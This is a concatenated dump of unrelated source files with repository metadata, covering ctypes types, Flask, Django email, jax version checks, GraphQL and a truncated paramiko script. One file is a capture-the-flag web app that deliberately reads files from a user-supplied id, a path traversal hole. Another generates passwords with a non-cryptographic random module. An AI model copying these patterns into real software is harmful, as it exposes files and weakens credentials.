] | 2 | 2021-12-17T15:41:35.000Z | 2021-12-17T15:41:37.000Z | nisyscfg/types.py | tkrebes/nisyscfg-python | 080cec262a30bfc2b00f703996d2ad896578a67a | [
"MIT"
] | 3 | 2020-12-08T16:43:36.000Z | 2022-01-23T15:50:02.000Z | nisyscfg/types.py | tkrebes/nisyscfg-python | 080cec262a30bfc2b00f703996d2ad896578a67a | [
"MIT"
] | null | null | null | # This file is code generated
import ctypes
simple_string = ctypes.c_char * 1024
UInt64 = ctypes.c_ulonglong
ResourceHandle = ctypes.c_void_p
EnumResourceHandle = ctypes.c_void_p
EnumSoftwareFeedHandle = ctypes.c_void_p
SessionHandle = ctypes.c_void_p
TimestampUTC = ctypes.c_uint * 4
EnumSoftwareComponentHandle = ctypes.c_void_p
EnumDependencyHandle = ctypes.c_void_p
SoftwareSetHandle = ctypes.c_void_p
FilterHandle = ctypes.c_void_p
EnumExpertHandle = ctypes.c_void_p
EnumSystemHandle = ctypes.c_void_p
EnumSoftwareSetHandle = ctypes.c_void_p
| 27.5 | 45 | 0.84 | # This file is code generated
import ctypes
simple_string = ctypes.c_char * 1024
UInt64 = ctypes.c_ulonglong
ResourceHandle = ctypes.c_void_p
EnumResourceHandle = ctypes.c_void_p
EnumSoftwareFeedHandle = ctypes.c_void_p
SessionHandle = ctypes.c_void_p
TimestampUTC = ctypes.c_uint * 4
EnumSoftwareComponentHandle = ctypes.c_void_p
EnumDependencyHandle = ctypes.c_void_p
SoftwareSetHandle = ctypes.c_void_p
FilterHandle = ctypes.c_void_p
EnumExpertHandle = ctypes.c_void_p
EnumSystemHandle = ctypes.c_void_p
EnumSoftwareSetHandle = ctypes.c_void_p
| 0 | 0 | 0 |
66871c8115c9f515390aa21924d566cce16565d8 | 1,248 | py | Python | web/wine/app.py | afnom/what-the-ctf-2020 | 9df5a18d911235d483383762b2fc6426ea95f239 | [
"MIT"
] | null | null | null | web/wine/app.py | afnom/what-the-ctf-2020 | 9df5a18d911235d483383762b2fc6426ea95f239 | [
"MIT"
] | null | null | null | web/wine/app.py | afnom/what-the-ctf-2020 | 9df5a18d911235d483383762b2fc6426ea95f239 | [
"MIT"
] | null | null | null | import os
import random
import string
from flask import Flask, render_template, request, redirect, url_for
app = Flask(__name__)
COMPLAINTS_DIR = 'complaints'
os.makedirs(COMPLAINTS_DIR, exist_ok=True)
@app.route('/')
@app.route('/complaint', methods=['GET'])
@app.route('/complaint', methods=['POST'])
if __name__ == '__main__':
app.run(host='0.0.0.0', port=4000)
| 26 | 83 | 0.657051 | import os
import random
import string
from flask import Flask, render_template, request, redirect, url_for
app = Flask(__name__)
COMPLAINTS_DIR = 'complaints'
os.makedirs(COMPLAINTS_DIR, exist_ok=True)
@app.route('/')
def index():
return render_template('index.html')
@app.route('/complaint', methods=['GET'])
def complaint():
i = request.args.get('id')
if i is None:
return render_template('error.html', message="no complaint specified"), 400
path = make_path(i)
print(path)
try:
with open(path) as f:
complaint = f.read()
except FileNotFoundError:
return render_template('error.html', message=f"{path} not found"), 404
return render_template('complaint.html', content=complaint)
@app.route('/complaint', methods=['POST'])
def make_complaint():
i = ''.join([random.choice(string.ascii_letters) for _ in range(10)])
content = request.form.get('content')
path = make_path(i)
with open(path, 'w') as f:
f.write(content)
return redirect(url_for('complaint') + '?id=' + i)
def make_path(i):
path = os.path.join(COMPLAINTS_DIR, i) + '.txt'
path = path[:40]
return path
if __name__ == '__main__':
app.run(host='0.0.0.0', port=4000)
| 785 | 0 | 89 |
36f3d68a22be7887c4f965e6b8da30455045f47a | 1,482 | py | Python | sky_visitor/template_email_senders.py | Apkawa/django-sky-visitor | 817f850a7ca4e3c7f2568ffdd2c2ddd0cf47cdad | [
"Apache-2.0"
] | null | null | null | sky_visitor/template_email_senders.py | Apkawa/django-sky-visitor | 817f850a7ca4e3c7f2568ffdd2c2ddd0cf47cdad | [
"Apache-2.0"
] | null | null | null | sky_visitor/template_email_senders.py | Apkawa/django-sky-visitor | 817f850a7ca4e3c7f2568ffdd2c2ddd0cf47cdad | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
from django.template import Template, Context, loader, TemplateDoesNotExist
from django.contrib.sites.models import Site
from django.core.mail import EmailMultiAlternatives
from django.template.defaultfilters import striptags
| 32.933333 | 75 | 0.687584 | # -*- coding: utf-8 -*-
from django.template import Template, Context, loader, TemplateDoesNotExist
from django.contrib.sites.models import Site
from django.core.mail import EmailMultiAlternatives
from django.template.defaultfilters import striptags
class BaseTemplateSender(object):
def send(self, template_name, to_address, text_template_name=None,
subject='', context=None, from_email=None, **kwargs):
pass
class DjangoTemplateSender(BaseTemplateSender):
def render(self, template_name, context):
t = loader.get_template(template_name)
return t.render(Context(context))
def _render_from_string(self, s, context):
t = Template(s)
return t.render(Context(context))
def send(self, template_name, to_address, text_template_name=None,
subject='', context=None, from_email=None, **kwargs):
context = context or {}
html_body = self.render(template_name, context)
try:
text_body = self.render(text_template_name, context)
except TemplateDoesNotExist:
text_body = striptags(html_body)
subject = self._render_from_string(subject, context)
if isinstance(to_address, (str, unicode)):
to_address = (to_address,)
msg = EmailMultiAlternatives(subject=subject, body=text_body,
from_email=from_email, to=to_address)
msg.attach_alternative(html_body, "text/html")
return msg.send()
| 1,035 | 38 | 152 |
6a0b2d97f3797679b5ea29d4d7c1f4d1cb65ce03 | 387 | py | Python | 2019/exam_solutions-2019December/question8.py | ati-ozgur/course-python | 38237d120043c07230658b56dc3aeb01c3364933 | [
"Apache-2.0"
] | 1 | 2021-02-04T16:59:11.000Z | 2021-02-04T16:59:11.000Z | 2019/exam_solutions-2019December/question8.py | ati-ozgur/course-python | 38237d120043c07230658b56dc3aeb01c3364933 | [
"Apache-2.0"
] | null | null | null | 2019/exam_solutions-2019December/question8.py | ati-ozgur/course-python | 38237d120043c07230658b56dc3aeb01c3364933 | [
"Apache-2.0"
] | 1 | 2019-10-30T14:37:48.000Z | 2019-10-30T14:37:48.000Z | import string
import random as rnd
for u in range(1000):
p1 = random_password()
print(p1)
| 24.1875 | 56 | 0.666667 | import string
import random as rnd
def random_password(length = 12):
password = ""
max = len(string.ascii_uppercase)
for index in range(length):
random_num = rnd.randint(1,max-1)
random_char = string.ascii_uppercase[random_num]
password = password + random_char
return password
for u in range(1000):
p1 = random_password()
print(p1)
| 266 | 0 | 22 |
0a5eb05ea3b413e02f36b8ed15446ad917f429ca | 1,905 | py | Python | jax/lib/__init__.py | jonasrauber/jax | 7cbd58b6c6f910e1d7b762d7ed51a057be138976 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | jax/lib/__init__.py | jonasrauber/jax | 7cbd58b6c6f910e1d7b762d7ed51a057be138976 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | jax/lib/__init__.py | jonasrauber/jax | 7cbd58b6c6f910e1d7b762d7ed51a057be138976 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | # Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This module is largely a wrapper around `jaxlib` that performs version
# checking on import.
import jaxlib
_minimum_jaxlib_version = (0, 1, 31)
try:
from jaxlib import version as jaxlib_version
except:
# jaxlib is too old to have version number.
msg = 'This version of jax requires jaxlib version >= {}.'
raise ImportError(msg.format('.'.join(map(str, _minimum_jaxlib_version))))
version = tuple(int(x) for x in jaxlib_version.__version__.split('.'))
# Check the jaxlib version before importing anything else from jaxlib.
_check_jaxlib_version()
from jaxlib import xla_client
from jaxlib import xrt
from jaxlib import lapack
from jaxlib import pytree
from jaxlib import cusolver
| 35.943396 | 80 | 0.706037 | # Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This module is largely a wrapper around `jaxlib` that performs version
# checking on import.
import jaxlib
_minimum_jaxlib_version = (0, 1, 31)
try:
from jaxlib import version as jaxlib_version
except:
# jaxlib is too old to have version number.
msg = 'This version of jax requires jaxlib version >= {}.'
raise ImportError(msg.format('.'.join(map(str, _minimum_jaxlib_version))))
version = tuple(int(x) for x in jaxlib_version.__version__.split('.'))
# Check the jaxlib version before importing anything else from jaxlib.
def _check_jaxlib_version():
if version < _minimum_jaxlib_version:
msg = 'jaxlib is version {}, but this version of jax requires version {}.'
if version == (0, 1, 23):
msg += ('\n\nA common cause of this error is that you installed jaxlib '
'using pip, but your version of pip is too old to support '
'manylinux2010 wheels. Try running:\n\n'
'pip install --upgrade pip\n'
'pip install --upgrade jax jaxlib\n')
raise ValueError(msg.format('.'.join(map(str, version)),
'.'.join(map(str, _minimum_jaxlib_version))))
_check_jaxlib_version()
from jaxlib import xla_client
from jaxlib import xrt
from jaxlib import lapack
from jaxlib import pytree
from jaxlib import cusolver
| 610 | 0 | 22 |
fbf78c1bb99660c1fb41b25072ddb3f5ee24fe9c | 1,178 | py | Python | QBG/DataLoader/loaders/index_loader.py | GYMS-PKU/Daily-Frequency-Quant | 808eda9930efecff04ecf98abf617404cadd0003 | [
"MIT"
] | 3 | 2021-11-21T04:35:04.000Z | 2022-03-04T09:19:53.000Z | QBG/DataLoader/loaders/index_loader.py | GYMS-PKU/Daily-Frequency-Quant | 808eda9930efecff04ecf98abf617404cadd0003 | [
"MIT"
] | null | null | null | QBG/DataLoader/loaders/index_loader.py | GYMS-PKU/Daily-Frequency-Quant | 808eda9930efecff04ecf98abf617404cadd0003 | [
"MIT"
] | 5 | 2021-10-03T00:00:22.000Z | 2022-03-07T09:02:00.000Z | # Copyright (c) 2022 Dai HBG
"""
获得日频指数成分股数据
日志
2022-01-05
- init,迁移原本功能
2022-01-08
- 更新:传入dates
- 增量更新
2022-01-11
- 更新:新增多种指数
"""
from jqdatasdk import *
import os
import pickle
import numpy as np
| 28.731707 | 91 | 0.596774 | # Copyright (c) 2022 Dai HBG
"""
获得日频指数成分股数据
日志
2022-01-05
- init,迁移原本功能
2022-01-08
- 更新:传入dates
- 增量更新
2022-01-11
- 更新:新增多种指数
"""
from jqdatasdk import *
import os
import pickle
import numpy as np
def get_index(dates: np.array, data_path: str):
lst = set(os.listdir('{}/StockDailyData'.format(data_path)))
print('getting index data...')
for date in dates:
if str(date) not in lst:
os.makedirs('{}/StockDailyData/{}'.format(data_path, date))
files = os.listdir('{}/StockDailyData/{}'.format(data_path, date))
if 'index_dic' in files: # 增量更新
print('{} done.'.format(date))
continue
index_dic = {'ZZ500': set(get_index_stocks('000905.XSHG', date=date)), # 中证500
'HS300': set(get_index_stocks('399300.XSHE', date=date)), # 沪深300
'ZZ1000': set(get_index_stocks('000852.XSHG', date=date)), # 中证1000
'SZ': set(get_index_stocks('000001.XSHG', date=date))} # 上证
with open('{}/StockDailyData/{}/index_dic.pkl'.format(data_path, date), 'wb') as f:
pickle.dump(index_dic, f)
print('{} done.'.format(date))
| 975 | 0 | 23 |
fd991e55f95c4bfe4d2a0c5b935f235c33c3adea | 360 | py | Python | main.py | kotekpsotek/awesome-instaling | ccabd75b8dad899a297125fb888b52b1b9fd77f7 | [
"MIT"
] | null | null | null | main.py | kotekpsotek/awesome-instaling | ccabd75b8dad899a297125fb888b52b1b9fd77f7 | [
"MIT"
] | null | null | null | main.py | kotekpsotek/awesome-instaling | ccabd75b8dad899a297125fb888b52b1b9fd77f7 | [
"MIT"
] | null | null | null | from get_set_login_data import get_login_data
from instaling import start_instaling
if __name__ == "__main__":
main() | 36 | 91 | 0.713889 | from get_set_login_data import get_login_data
from instaling import start_instaling
def main():
login, password = get_login_data().values() # get login data and quick destructure them
start_instaling(login, password) # start instaling
# print("The login is: " + login + "\n" + "The password is: " + password)
if __name__ == "__main__":
main() | 215 | 0 | 23 |
72851db9122740699bd2adbb8f7f8a806d22f652 | 126 | py | Python | opdracht-01.py | TPLxxA/pathways-python-opdrachten | e29da62cb91257afce2ff81acd23def68b082914 | [
"Unlicense"
] | null | null | null | opdracht-01.py | TPLxxA/pathways-python-opdrachten | e29da62cb91257afce2ff81acd23def68b082914 | [
"Unlicense"
] | null | null | null | opdracht-01.py | TPLxxA/pathways-python-opdrachten | e29da62cb91257afce2ff81acd23def68b082914 | [
"Unlicense"
] | null | null | null | var = "Casper"
print ("Value 1:", var)
var = 23
print ("Value 2:", var)
var = "You get the point"
print ("Value 3:", var) | 21 | 26 | 0.579365 | var = "Casper"
print ("Value 1:", var)
var = 23
print ("Value 2:", var)
var = "You get the point"
print ("Value 3:", var) | 0 | 0 | 0 |
724a1a0ea383615277b1e465022474b304dd6a5b | 1,905 | py | Python | tests/schema/product/gql/fragments/fragment_product.py | simonsobs/acondbs | 6ca11c2889d827ecdb2b54d0cf3b94b8cdd281e6 | [
"MIT"
] | null | null | null | tests/schema/product/gql/fragments/fragment_product.py | simonsobs/acondbs | 6ca11c2889d827ecdb2b54d0cf3b94b8cdd281e6 | [
"MIT"
] | 24 | 2020-04-02T19:29:07.000Z | 2022-03-08T03:05:43.000Z | tests/schema/product/gql/fragments/fragment_product.py | simonsobs/acondbs | 6ca11c2889d827ecdb2b54d0cf3b94b8cdd281e6 | [
"MIT"
] | 1 | 2020-04-08T15:48:28.000Z | 2020-04-08T15:48:28.000Z | FRAGMENT_PRODUCT = """
fragment fragmentProduct on Product {
productId
typeId
type_ {
typeId
name
}
attributesUnicodeText {
edges {
node {
name
field {
name
type_
}
value
}
}
}
attributesBoolean {
edges {
node {
name
field {
name
type_
}
value
}
}
}
attributesInteger {
edges {
node {
name
field {
name
type_
}
value
}
}
}
attributesFloat {
edges {
node {
name
field {
name
type_
}
value
}
}
}
attributesDate {
edges {
node {
name
field {
name
type_
}
value
}
}
}
attributesDateTime {
edges {
node {
name
field {
name
type_
}
value
}
}
}
attributesTime {
edges {
node {
name
field {
name
type_
}
value
}
}
}
name
contact
dateProduced
producedBy
timePosted
postedBy
postingGitHubUser {
login
}
timeUpdated
updatedBy
updatingGitHubUser {
login
}
paths {
edges {
node {
pathId
path
note
}
}
}
relations {
edges {
node {
relationId
typeId
type_ {
typeId
name
}
otherProductId
other {
productId
typeId
type_ {
typeId
name
}
name
}
reverseRelationId
reverse {
relationId
typeId
type_ {
typeId
name
}
}
}
}
}
note
}
"""
| 12.7 | 37 | 0.379528 | FRAGMENT_PRODUCT = """
fragment fragmentProduct on Product {
productId
typeId
type_ {
typeId
name
}
attributesUnicodeText {
edges {
node {
name
field {
name
type_
}
value
}
}
}
attributesBoolean {
edges {
node {
name
field {
name
type_
}
value
}
}
}
attributesInteger {
edges {
node {
name
field {
name
type_
}
value
}
}
}
attributesFloat {
edges {
node {
name
field {
name
type_
}
value
}
}
}
attributesDate {
edges {
node {
name
field {
name
type_
}
value
}
}
}
attributesDateTime {
edges {
node {
name
field {
name
type_
}
value
}
}
}
attributesTime {
edges {
node {
name
field {
name
type_
}
value
}
}
}
name
contact
dateProduced
producedBy
timePosted
postedBy
postingGitHubUser {
login
}
timeUpdated
updatedBy
updatingGitHubUser {
login
}
paths {
edges {
node {
pathId
path
note
}
}
}
relations {
edges {
node {
relationId
typeId
type_ {
typeId
name
}
otherProductId
other {
productId
typeId
type_ {
typeId
name
}
name
}
reverseRelationId
reverse {
relationId
typeId
type_ {
typeId
name
}
}
}
}
}
note
}
"""
| 0 | 0 | 0 |
78c6be06d7717f86a877f33e3e064213195a0051 | 2,049 | py | Python | backend/firebug_server/swagger_server/models/concentration_series.py | aandr/firebug | bae24a65994b0ed1ab0dc3c1295f884d526ae2ba | [
"MIT"
] | null | null | null | backend/firebug_server/swagger_server/models/concentration_series.py | aandr/firebug | bae24a65994b0ed1ab0dc3c1295f884d526ae2ba | [
"MIT"
] | 7 | 2021-03-09T09:59:54.000Z | 2022-02-26T13:14:59.000Z | backend/firebug_server/swagger_server/models/concentration_series.py | aandr/firebug | bae24a65994b0ed1ab0dc3c1295f884d526ae2ba | [
"MIT"
] | null | null | null | # coding: utf-8
from __future__ import absolute_import
from datetime import date, datetime # noqa: F401
from typing import List, Dict # noqa: F401
from swagger_server.models.base_model_ import Model
from swagger_server import util
class ConcentrationSeries(Model):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self, concentrationlist: List[float]=None): # noqa: E501
"""ConcentrationSeries - a model defined in Swagger
:param concentrationlist: The concentrationlist of this ConcentrationSeries. # noqa: E501
:type concentrationlist: List[float]
"""
self.swagger_types = {
'concentrationlist': List[float]
}
self.attribute_map = {
'concentrationlist': 'concentrationlist'
}
self._concentrationlist = concentrationlist
@classmethod
def from_dict(cls, dikt) -> 'ConcentrationSeries':
"""Returns the dict as a model
:param dikt: A dict.
:type: dict
:return: The ConcentrationSeries of this ConcentrationSeries. # noqa: E501
:rtype: ConcentrationSeries
"""
return util.deserialize_model(dikt, cls)
@property
def concentrationlist(self) -> List[float]:
"""Gets the concentrationlist of this ConcentrationSeries.
:return: The concentrationlist of this ConcentrationSeries.
:rtype: List[float]
"""
return self._concentrationlist
@concentrationlist.setter
def concentrationlist(self, concentrationlist: List[float]):
"""Sets the concentrationlist of this ConcentrationSeries.
:param concentrationlist: The concentrationlist of this ConcentrationSeries.
:type concentrationlist: List[float]
"""
if concentrationlist is None:
raise ValueError("Invalid value for `concentrationlist`, must not be `None`") # noqa: E501
self._concentrationlist = concentrationlist
| 30.58209 | 103 | 0.673987 | # coding: utf-8
from __future__ import absolute_import
from datetime import date, datetime # noqa: F401
from typing import List, Dict # noqa: F401
from swagger_server.models.base_model_ import Model
from swagger_server import util
class ConcentrationSeries(Model):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self, concentrationlist: List[float]=None): # noqa: E501
"""ConcentrationSeries - a model defined in Swagger
:param concentrationlist: The concentrationlist of this ConcentrationSeries. # noqa: E501
:type concentrationlist: List[float]
"""
self.swagger_types = {
'concentrationlist': List[float]
}
self.attribute_map = {
'concentrationlist': 'concentrationlist'
}
self._concentrationlist = concentrationlist
@classmethod
def from_dict(cls, dikt) -> 'ConcentrationSeries':
"""Returns the dict as a model
:param dikt: A dict.
:type: dict
:return: The ConcentrationSeries of this ConcentrationSeries. # noqa: E501
:rtype: ConcentrationSeries
"""
return util.deserialize_model(dikt, cls)
@property
def concentrationlist(self) -> List[float]:
"""Gets the concentrationlist of this ConcentrationSeries.
:return: The concentrationlist of this ConcentrationSeries.
:rtype: List[float]
"""
return self._concentrationlist
@concentrationlist.setter
def concentrationlist(self, concentrationlist: List[float]):
"""Sets the concentrationlist of this ConcentrationSeries.
:param concentrationlist: The concentrationlist of this ConcentrationSeries.
:type concentrationlist: List[float]
"""
if concentrationlist is None:
raise ValueError("Invalid value for `concentrationlist`, must not be `None`") # noqa: E501
self._concentrationlist = concentrationlist
| 0 | 0 | 0 |
f0d0f00450724876d5e490a03f16b544916b1045 | 2,007 | py | Python | src/Multithreading.py | ng-haste/pyNG-HASTE | c910e126ec1bf2a7be3afc7e587f782a6b3fc97a | [
"MIT"
] | null | null | null | src/Multithreading.py | ng-haste/pyNG-HASTE | c910e126ec1bf2a7be3afc7e587f782a6b3fc97a | [
"MIT"
] | null | null | null | src/Multithreading.py | ng-haste/pyNG-HASTE | c910e126ec1bf2a7be3afc7e587f782a6b3fc97a | [
"MIT"
] | null | null | null | from Algorithm import SearchTree, GraphContainer
from multiprocessing import Process, Queue
import time
| 25.0875 | 121 | 0.586447 | from Algorithm import SearchTree, GraphContainer
from multiprocessing import Process, Queue
import time
def runJob(env, container, q):
tree = SearchTree(container, env)
iterations = 0
startTime = time.time()
for i in range(10000):
if container.isEmpty():
break
tree.nextItr()
iterations += 1
q.put((container, iterations))
def startThread(env, container, q):
tree = None
itr = 0
while len(container.graphs) < 250:
if tree == None:
tree = SearchTree(container, env)
tree.nextItr()
itr += 1
miniCon = GraphContainer()
miniCon.graphs = container.graphs[:250]
container.graphs = container.graphs[250:]
Process(target=runJob, args=(env, miniCon, q)).start()
return itr
def findSolutionParrallel(env, container, threadCount):
startTime = time.time()
liveThreads = 0
itr = 0
q = Queue()
for i in range(threadCount):
if container.isEmpty():
break
itr += startThread(env, container, q)
liveThreads += 1
foundSolution = False
while liveThreads > 0 and not foundSolution:
miniCon, iterations = q.get()
liveThreads -= 1
itr += iterations
for graph in miniCon.graphs:
container.push(graph)
for solution in miniCon.solutions:
container.addSolution(solution)
foundSolution = True
if not foundSolution:
while liveThreads < threadCount:
if container.isEmpty():
break
itr += startThread(env, container, q)
liveThreads += 1
endTime = time.time()
elapsedTime = endTime - startTime
print('Iterations: {: >9,}, Open: {: >9,}, Solutions: {: >3,}, Time: {: >7,.1f}s ({: >7,.1f}g/s), Threads: {}'
.format(itr, len(container.graphs), len(container.solutions), elapsedTime, itr / elapsedTime, liveThreads))
return itr
| 1,831 | 0 | 69 |
56fb5246123ec3f1497bc6a06efa6f423a14c683 | 3,209 | py | Python | test/testAuthentication.py | twissell-/anipy | 331fa229c5d2a523de02254835c15eee91c4333b | [
"MIT"
] | 14 | 2016-07-14T17:23:47.000Z | 2021-07-02T02:39:55.000Z | test/testAuthentication.py | twissell-/anipy | 331fa229c5d2a523de02254835c15eee91c4333b | [
"MIT"
] | 4 | 2016-11-14T23:01:03.000Z | 2021-06-22T15:02:14.000Z | test/testAuthentication.py | twissell-/anipy | 331fa229c5d2a523de02254835c15eee91c4333b | [
"MIT"
] | 3 | 2020-10-30T13:54:51.000Z | 2022-03-05T16:56:01.000Z | from urllib3_mock import Responses
from anipy import (
AuthenticationProvider,
)
import os
# from anipy.exception import AniException
# from anipy.exception import InternalServerError
# from anipy.exception import InvalidGrantException
# from anipy.exception import InvalidRequestException
# from anipy.exception import UnauthorizedException
| 31.15534 | 67 | 0.599564 | from urllib3_mock import Responses
from anipy import (
AuthenticationProvider,
)
import os
# from anipy.exception import AniException
# from anipy.exception import InternalServerError
# from anipy.exception import InvalidGrantException
# from anipy.exception import InvalidRequestException
# from anipy.exception import UnauthorizedException
class TestAuthentication(object):
responses = Responses('requests.packages.urllib3')
def testRefreshAuthentication(self):
auth = AuthenticationProvider.currentAuth()
assert auth.accessToken
assert auth.expires
assert auth.tokenType == 'Bearer'
assert auth.expiresIn == 3600
assert auth.refreshToken == os.environ.get('REFRESH_TOKEN')
assert not auth.isExpired
assert auth is AuthenticationProvider.currentAuth()
# @responses.activate
# def testInternalServerError(self):
# TestAuthentication.responses.add(
# 'POST', '/api/auth/access_token',
# status=500)
#
# try:
# Authentication.fromCode('authenticationcode')
# except Exception as e:
# assert isinstance(e, InternalServerError)
# else:
# assert False
#
# @responses.activate
# def testMethodNotAllowed(self):
# TestAuthentication.responses.add(
# 'POST', '/api/auth/access_token',
# status=405)
#
# try:
# Authentication.fromCode('authenticationcode')
# except Exception as e:
# assert isinstance(e, AniException)
# assert str(e) == 'HTTP 405 Method not allowed.'
# else:
# assert False
#
# @responses.activate
# def testInvalidGrantException(self):
# TestAuthentication.responses.add(
# 'POST', '/api/auth/access_token',
# body=b'{"error":"invalid_grant"}',
# status=400,
# content_type='application/json')
#
# try:
# Authentication.fromCode('authenticationcode')
# except Exception as e:
# assert isinstance(e, InvalidGrantException)
# else:
# assert False
#
# @responses.activate
# def testInvalidRequest(self):
# TestAuthentication.responses.add(
# 'POST', '/api/auth/access_token',
# body=b'{"error":"invalid_request"}',
# status=400,
# content_type='application/json')
#
# try:
# Authentication.fromCode('authenticationcode')
# except Exception as e:
# assert isinstance(e, InvalidRequestException)
# else:
# assert False
#
# @responses.activate
# def testInvalidUnauthorizedException(self):
# TestAuthentication.responses.add(
# 'POST', '/api/auth/access_token',
# body=b'{"error":"unauthorized"}',
# status=401,
# content_type='application/json')
#
# try:
# Authentication.fromCode('authenticationcode')
# except Exception as e:
# assert isinstance(e, UnauthorizedException)
# else:
# assert False
| 371 | 2,465 | 23 |
e1d33fe276058ac77a26d51b4cdc63a4bb229f10 | 1,658 | py | Python | ymir/backend/src/ymir_controller/controller/invoker/invoker_cmd_branch_list.py | Zhang-SJ930104/ymir | dd6481be6f229ade4cf8fba64ef44a15357430c4 | [
"Apache-2.0"
] | 64 | 2021-11-15T03:48:00.000Z | 2022-03-25T07:08:46.000Z | ymir/backend/src/ymir_controller/controller/invoker/invoker_cmd_branch_list.py | Zhang-SJ930104/ymir | dd6481be6f229ade4cf8fba64ef44a15357430c4 | [
"Apache-2.0"
] | 35 | 2021-11-23T04:14:35.000Z | 2022-03-26T09:03:43.000Z | ymir/backend/src/ymir_controller/controller/invoker/invoker_cmd_branch_list.py | Aryalfrat/ymir | d4617ed00ef67a77ab4e1944763f608bface4be6 | [
"Apache-2.0"
] | 57 | 2021-11-11T10:15:40.000Z | 2022-03-29T07:27:54.000Z | from controller.invoker.invoker_cmd_base import BaseMirControllerInvoker
from controller.utils import checker, utils
from id_definition.error_codes import CTLResponseCode
from proto import backend_pb2
| 46.055556 | 112 | 0.600724 | from controller.invoker.invoker_cmd_base import BaseMirControllerInvoker
from controller.utils import checker, utils
from id_definition.error_codes import CTLResponseCode
from proto import backend_pb2
class BranchListInvoker(BaseMirControllerInvoker):
def pre_invoke(self) -> backend_pb2.GeneralResp:
return checker.check_request(request=self._request,
prerequisites=[
checker.Prerequisites.CHECK_USER_ID,
checker.Prerequisites.CHECK_REPO_ID,
checker.Prerequisites.CHECK_REPO_ROOT_EXIST,
],
mir_root=self._repo_root)
def invoke(self) -> backend_pb2.GeneralResp:
expected_type = backend_pb2.RequestType.CMD_BRANCH_LIST
if self._request.req_type != expected_type:
return utils.make_general_response(CTLResponseCode.MIS_MATCHED_INVOKER_TYPE,
f"expected: {expected_type} vs actual: {self._request.req_type}")
command = [utils.mir_executable(), 'branch', '--root', self._repo_root]
response = utils.run_command(command)
if response.code == 0 and response.message:
message_lines = response.message.splitlines()
for message_line in message_lines:
# remove empty lines
message_line = message_line.strip()
if message_line:
response.ext_strs.append(message_line)
response.message = ""
return response
| 1,351 | 29 | 76 |
97dfc3b4f92246adb98d90753894a41d866a8df3 | 292 | py | Python | view_breadcrumbs/generic/__init__.py | codacy-badger/django-view-breadcrumbs | f6edd20db12c7afdb1ba14bf84b78eeca90ee72b | [
"BSD-3-Clause"
] | 29 | 2020-10-17T05:28:52.000Z | 2022-03-10T21:14:06.000Z | view_breadcrumbs/generic/__init__.py | codacy-badger/django-view-breadcrumbs | f6edd20db12c7afdb1ba14bf84b78eeca90ee72b | [
"BSD-3-Clause"
] | 225 | 2020-08-17T13:21:41.000Z | 2022-03-31T11:58:50.000Z | view_breadcrumbs/generic/__init__.py | codacy-badger/django-view-breadcrumbs | f6edd20db12c7afdb1ba14bf84b78eeca90ee72b | [
"BSD-3-Clause"
] | 5 | 2021-04-24T21:30:21.000Z | 2021-11-01T20:28:19.000Z | from .base import BaseBreadcrumbMixin # noqa
from .create import CreateBreadcrumbMixin # noqa
from .delete import DeleteBreadcrumbMixin # noqa
from .detail import DetailBreadcrumbMixin # noqa
from .list import ListBreadcrumbMixin # noqa
from .update import UpdateBreadcrumbMixin # noqa
| 41.714286 | 49 | 0.815068 | from .base import BaseBreadcrumbMixin # noqa
from .create import CreateBreadcrumbMixin # noqa
from .delete import DeleteBreadcrumbMixin # noqa
from .detail import DetailBreadcrumbMixin # noqa
from .list import ListBreadcrumbMixin # noqa
from .update import UpdateBreadcrumbMixin # noqa
| 0 | 0 | 0 |
1f6d256b45288074b3de10940e3ca152e1a8f5d6 | 217 | py | Python | shlink/data/__init__.py | DavidSouthgate/shlink-py | 86320dd55bfb391c9d66d2d2014463661cee6e58 | [
"MIT"
] | null | null | null | shlink/data/__init__.py | DavidSouthgate/shlink-py | 86320dd55bfb391c9d66d2d2014463661cee6e58 | [
"MIT"
] | null | null | null | shlink/data/__init__.py | DavidSouthgate/shlink-py | 86320dd55bfb391c9d66d2d2014463661cee6e58 | [
"MIT"
] | 1 | 2021-06-23T13:04:57.000Z | 2021-06-23T13:04:57.000Z | from .data import Data
from .error import Error
from .paged_data import PagedData
from .pagination import Pagination
from .short_url import ShortUrl
__all__ = ["Data", "PagedData", "Error", "Pagination", "ShortUrl"]
| 27.125 | 66 | 0.769585 | from .data import Data
from .error import Error
from .paged_data import PagedData
from .pagination import Pagination
from .short_url import ShortUrl
__all__ = ["Data", "PagedData", "Error", "Pagination", "ShortUrl"]
| 0 | 0 | 0 |
d077aba0bc5f6fe39e822869cd7ddde2d6493c66 | 2,173 | py | Python | serverchecker.py | EMC-prog/ServerChecker | 718b8d1b88880fb902c8376af3c7be11d71cdd86 | [
"MIT"
] | 1 | 2022-01-29T07:45:54.000Z | 2022-01-29T07:45:54.000Z | serverchecker.py | EMC-prog/ServerChecker | 718b8d1b88880fb902c8376af3c7be11d71cdd86 | [
"MIT"
] | null | null | null | serverchecker.py | EMC-prog/ServerChecker | 718b8d1b88880fb902c8376af3c7be11d71cdd86 | [
"MIT"
] | null | null | null | # Original by EMC-prog
# UNDER THE MIT LICENSE
import paramiko
import time
import os
import json
import sys
from getpass import getpass
print("ServerChecker")
print("Check and command your linux server without knowing Linux")
time.sleep(2)
os.system('cls' if os.name == 'nt' else 'clear')
#Know if the program has been opened already:
f = open("data/1ststart", "r")
iststart = f.read()
f.close
if iststart == "0":
print("Looks like you haven't started this program before. You have to fill the file located in 'data/info.txt'.")
